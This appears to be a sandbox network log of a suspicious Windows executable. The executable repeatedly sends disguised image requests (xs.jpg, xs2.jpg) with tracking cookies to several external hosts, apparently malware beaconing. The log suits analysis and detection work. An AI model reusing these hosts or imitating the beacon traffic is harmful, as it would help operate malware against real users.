                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:15.390551090 CEST308OUTGET /images/xs.jpg?2dce9fa=384258000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0
                                  Jul 5, 2024 08:01:16.142571926 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.94973444.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:16.152287960 CEST299OUTGET /xs.jpg?2f6b0f9=149164779 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0
                                  Jul 5, 2024 08:01:17.383012056 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0
                                  Jul 5, 2024 08:01:17.383548975 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0
                                  Jul 5, 2024 08:01:17.384350061 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:16 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.94973544.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:17.395349979 CEST302OUTGET /images/xs.jpg?341e887=546510150 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:17.907382965 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:17 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.94973678.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:17.914841890 CEST190OUTGET /xs.jpg?34f3b0d=388668763 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:18.567919016 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:18 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.94973737.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:18.587393999 CEST203OUTGET /images/xs2.jpg?362c1e4=113607624 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:19.293400049 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:19 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:19.340424061 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:19.561398983 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:19 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:19 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.94973854.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:19.716191053 CEST308OUTGET /images/xs.jpg?3c84448=190368984 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0
                                  Jul 5, 2024 08:01:20.445621014 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:20 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.94973944.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:20.454312086 CEST299OUTGET /xs.jpg?3dc8d75=518286248 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0
                                  Jul 5, 2024 08:01:20.982238054 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:20 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.94974044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:20.999936104 CEST302OUTGET /images/xs.jpg?3e9e01a=262635624 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:21.542736053 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:21 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.94974178.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:21.557941914 CEST190OUTGET /xs.jpg?42142ff=692887030 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:22.208187103 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:22 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.94974237.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:22.240417004 CEST203OUTGET /images/xs2.jpg?434c9e5=282273684 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:22.961486101 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:22 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:22.967592001 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:23.189316034 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:23 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:23 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.94974354.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:23.310866117 CEST308OUTGET /images/xs.jpg?475ad88=299284000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0
                                  Jul 5, 2024 08:01:24.076677084 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:23 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.94974444.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:24.084115028 CEST299OUTGET /xs.jpg?4ae2102=706685202 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0
                                  Jul 5, 2024 08:01:24.617609978 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:24 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
